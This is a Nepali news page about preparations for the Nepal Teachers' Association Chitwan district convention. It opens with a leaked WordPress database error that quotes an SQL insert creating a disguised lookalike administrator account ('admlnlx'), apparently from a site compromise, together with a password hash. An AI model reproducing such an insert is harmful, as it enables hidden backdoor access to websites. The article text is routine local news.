WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bopz1h9ILz.Ehe4GYeJVFV50ufybAb.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:18:07', '', 'admlnlx', 'admlnlx')
चितवन, माघ २७–
नेपाल शिक्षक संघ चितवनको ८ औ जिल्ला अधिवेसनको तयारी पुरा भएको छ । भोली (शुक्रबार) हुने अधिवेसनको नेपाली काँग्रेसका केन्द्रिय सदस्य एवंम पूर्व मन्त्री प्रकाशमान सिंहले उद्घाटन गर्ने कार्यक्रम रहेको छ । एक हजार ६ सय ८७ सदस्य रहेको संघको अधिवेसनले चार वर्षे कार्यकालका लागि नयाँ नेतृत्व चयन गर्दै छ ।
नेपाल शिक्षक संघका अध्यक्ष ध्रुर्व पोखरेलका अनुसार भोलि उद्घाटन पछि शनिबार बन्दसत्र मार्फत नयाँ नेतृत्व चयन गर्ने कार्यक्रम रहेको छ ।